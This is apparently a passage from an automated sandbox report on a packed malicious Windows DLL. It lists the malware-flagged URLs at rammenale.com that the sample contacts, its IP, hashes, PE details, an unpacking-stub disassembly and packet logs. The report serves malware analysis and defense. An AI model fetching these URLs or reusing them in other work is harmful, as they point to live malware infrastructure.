    https://rammenale.com/for2/aclog.txtx4Crundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtJrundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtIrundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtfs:rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtM3rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmprI3-rundll32.exe, 00000009.00000002.3369940309.00000000035C4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtTrundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt44rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp&btrundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtPrundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008123000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpentfcrundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt4Grundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp0srundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpkburundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regMrundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp(frundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpkJrundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtfrundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtdrundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpWJzrundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpsC:loaddll32.exe, 00000000.00000002.2160947833.0000000000C00000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt_rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt4Xrundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt4Wrundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp6634-1003Vbtrundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt)rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtentrundll32.exe, 00000005.00000002.3369497741.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp4$rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp~rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt4Prundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt4rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt2rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmplSrundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt4hrundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpprundll32.exe, 00000008.00000002.3374164503.0000000007AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmpfalse
      		unknown
      https://rammenale.com/for2/regit.tmpqrundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txt:rundll32.exe, 00000005.00000002.3370723210.0000000003050000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3370922957.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3371348346.0000000003700000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmpkrundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        https://rammenale.com/for2/aclog.txt9rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmplrundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmpmrundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmpBJjrundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/aclog.txtF2rundll32.exe, 00000005.00000002.3369497741.0000000000C9A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/aclogDevicerundll32.exe, 00000005.00000002.3372199010.0000000004FD0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/aclog.txtCrundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmpzrundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/aclog.txtArundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmpC:rundll32.exe, 00000003.00000002.2132858298.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2133337781.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369773765.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369384121.0000000000500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369536080.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369313271.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmpurundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        131.153.206.231
        		rammenale.comUnited States
        		19437SS-ASHUStrue

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1500944
        Start date and time:2024-08-29 06:52:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 0s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:16
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:LLD5HDX0PS.dll
        renamed because original name is a hash value
        Original Sample Name:4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472.dll
        Detection:MAL
        Classification:mal84.evad.winDLL@20/0@1/1
        EGA Information:
        • Successful, ratio: 40%
        HCA Information:
        • Successful, ratio: 97%
        • Number of executed functions: 15
        • Number of non-executed functions: 52
        Cookbook Comments:
        • Found application associated with file extension: .dll

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target rundll32.exe, PID 2192 because there are no executed function
        • Execution Graph export aborted for target rundll32.exe, PID 4988 because there are no executed function
        • Execution Graph export aborted for target rundll32.exe, PID 5960 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        00:53:01API Interceptor2x Sleep call for process: rundll32.exe modified
        00:53:04API Interceptor1x Sleep call for process: loaddll32.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        131.153.206.231Dll1.dllGet hashmaliciousUnknownBrowse
          Dll1.dllGet hashmaliciousUnknownBrowse

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            rammenale.comDll1.dllGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            Dll1.dllGet hashmaliciousUnknownBrowse
            • 131.153.206.231

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            SS-ASHUSDll1.dllGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            Dll1.dllGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            https://blockchainsolution.netlify.app/Get hashmaliciousUnknownBrowse
            • 131.153.206.100
            http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.jsGet hashmaliciousUnknownBrowse
            • 131.153.206.103
            [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
            • 131.153.100.38
            Bank Slip.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 131.153.147.106
            Fatura20240617.exeGet hashmaliciousFormBookBrowse
            • 131.153.148.82
            0tkRwEewXq.exeGet hashmaliciousFormBookBrowse
            • 131.153.170.234
            CMgd5ZVG2N.elfGet hashmaliciousUnknownBrowse
            • 209.100.21.94
            CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
            • 131.153.148.82

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, VidarBrowse
            • 131.153.206.231
            rSHIPMENT_DOCMSS24071327.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 131.153.206.231
            file.exeGet hashmaliciousLummaC, VidarBrowse
            • 131.153.206.231
            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
            • 131.153.206.231
            Dll1.dllGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            Dll1.dllGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            file.exeGet hashmaliciousLummaC, VidarBrowse
            • 131.153.206.231
            x64_installer__v4.5.6.msiGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            Ad#U043ebe_Activator.exeGet hashmaliciousLummaCBrowse
            • 131.153.206.231
            file.exeGet hashmaliciousMeduza StealerBrowse
            • 131.153.206.231

            Dropped Files

            No context

            Created / dropped Files

            No created / dropped files found

            Static File Info

            General

            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
            Entropy (8bit):7.869173036924203
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 96.66%
            • UPX compressed Win32 Executable (30571/9) 2.95%
            • Generic Win/DOS Executable (2004/3) 0.19%
            • DOS Executable Generic (2002/1) 0.19%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:LLD5HDX0PS.dll
            File size:77'312 bytes
            MD5:030a68e321dec0e77b4698fccc5d54db
            SHA1:7b792a49fe27a298343ba26db8cac5ccb150ff89
            SHA256:4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472
            SHA512:e6be981690a90fdba8ec35b426a0b4c9617f13ae91d8a93a7e2acec906b23ac46436649d1980bd805937676e7efb6b0d8d9a2b925202e1c1aff4f01e0e6b8a4c
            SSDEEP:1536:NZ1aEkcCXLqDnRoTMWGuddGlCK1/hCE+pg0OoiKz25Rc5KQ:X1IXLqrRogCK1VTQK5RcIQ
            TLSH:7C7302EA912B60F3E71462F4608BE376310EEDE0A03DD5C11F6AF487DE9758169847B2
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\K...*...*...*..SR...*..SR...*..SR...*..SR...*...*..{*.......*.......*..SR...*......>*..u....*..u....*..u....*..u....*..Rich.*.

            File Icon

            Icon Hash:7ae282899bbab082

            Static PE Info

            General

            Entrypoint:0x1002d240
            Entrypoint Section:UPX1
            Digitally signed:false
            Imagebase:0x10000000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x65C149B1 [Mon Feb 5 20:48:49 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:0e4a2d076bfe5641392f761be41a5939

            Entrypoint Preview

            Instruction
            cmp byte ptr [esp+08h], 00000001h
            jne 00007F6E2C8DE578h
            pushad
            mov esi, 1001B000h
            lea edi, dword ptr [esi-0001A000h]
            push edi
            jmp 00007F6E2C8DE3C2h
            nop
            nop
            nop
            nop
            nop
            nop
            mov al, byte ptr [esi]
            inc esi
            mov byte ptr [edi], al
            inc edi
            add ebx, ebx
            jne 00007F6E2C8DE3B9h
            mov ebx, dword ptr [esi]
            sub esi, FFFFFFFCh
            adc ebx, ebx
            jc 00007F6E2C8DE39Fh
            mov eax, 00000001h
            add ebx, ebx
            jne 00007F6E2C8DE3B9h
            mov ebx, dword ptr [esi]
            sub esi, FFFFFFFCh
            adc ebx, ebx
            adc eax, eax
            add ebx, ebx
            jnc 00007F6E2C8DE3A1h
            jne 00007F6E2C8DE3BBh
            mov ebx, dword ptr [esi]
            sub esi, FFFFFFFCh
            adc ebx, ebx
            jnc 00007F6E2C8DE396h
            xor ecx, ecx
            sub eax, 03h
            jc 00007F6E2C8DE3BFh
            shl eax, 08h
            mov al, byte ptr [esi]
            inc esi
            xor eax, FFFFFFFFh
            je 00007F6E2C8DE426h
            mov ebp, eax
            add ebx, ebx
            jne 00007F6E2C8DE3B9h
            mov ebx, dword ptr [esi]
            sub esi, FFFFFFFCh
            adc ebx, ebx
            adc ecx, ecx
            add ebx, ebx
            jne 00007F6E2C8DE3B9h
            mov ebx, dword ptr [esi]
            sub esi, FFFFFFFCh
            adc ebx, ebx
            adc ecx, ecx
            jne 00007F6E2C8DE3D2h
            inc ecx
            add ebx, ebx
            jne 00007F6E2C8DE3B9h
            mov ebx, dword ptr [esi]
            sub esi, FFFFFFFCh
            adc ebx, ebx
            adc ecx, ecx
            add ebx, ebx
            jnc 00007F6E2C8DE3A1h
            jne 00007F6E2C8DE3BBh
            mov ebx, dword ptr [esi]
            sub esi, FFFFFFFCh
            adc ebx, ebx
            jnc 00007F6E2C8DE396h
            add ecx, 02h
            cmp ebp, FFFFF300h
            adc ecx, 01h
            lea edx, dword ptr [edi+ebp]
            cmp ebp, FFFFFFFCh
            jbe 00007F6E2C8DE3C1h
            mov al, byte ptr [edx]
            inc edx
            mov byte ptr [edi], al
            inc edi
            dec ecx
            jne 00007F6E2C8DE3A9h
            jmp 00007F6E2C8DE318h
            nop
            mov eax, dword ptr [edx]
            add edx, 00000000h

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x2e2800x50.rsrc
            IMAGE_DIRECTORY_ENTRY_IMPORT0x2e1ac0xd4.rsrc
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x1ac.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e2d00x14.rsrc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d4140xc0UPX1
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            UPX00x10000x1a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            UPX10x1b0000x130000x126004350757fa27457564ee454ba47f08942False0.9846274447278912data7.906342711948234IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x2e0000x10000x40021f64ab7d3b70b498bd044741208f902False0.4462890625data4.003532246262853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_MANIFEST0x2e05c0x14eXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.6407185628742516

            Imports

            DLLImport
            KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect
            ole32.dllCoInitialize
            OLEAUT32.dllSysAllocString

            Exports

            NameOrdinalAddress
            mydllmain10x10001026

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 29, 2024 06:53:04.206228971 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.206279993 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.206345081 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.213408947 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.213459969 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.213627100 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.229774952 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.229793072 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.234787941 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.234816074 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.234895945 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.250786066 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.250802040 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.255534887 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.255549908 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.255630970 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.301243067 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.301259041 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.301644087 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.301659107 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.447426081 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.447459936 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.447563887 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.455698967 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.455713987 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.459203959 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.459230900 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:04.459283113 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.470041037 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:04.470057011 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.154149055 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.154231071 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.173603058 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.173698902 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.213768959 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.213835001 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.225811005 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.225889921 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.402849913 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.402919054 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.418426037 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.418512106 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.467086077 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.467106104 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.467355967 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.467438936 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.470946074 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.476067066 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.476082087 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.476280928 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.476337910 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.477468014 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.477488041 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.477845907 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.477901936 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.477957964 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.479577065 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.507529974 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.507543087 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.508647919 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.508723021 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.510802031 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.516496897 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.520499945 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.524494886 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.526310921 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.526323080 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.526578903 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.526628971 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.529030085 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.552506924 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.557682037 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.557697058 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.557965994 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.558012009 CEST49713443192.168.2.6131.153.206.231
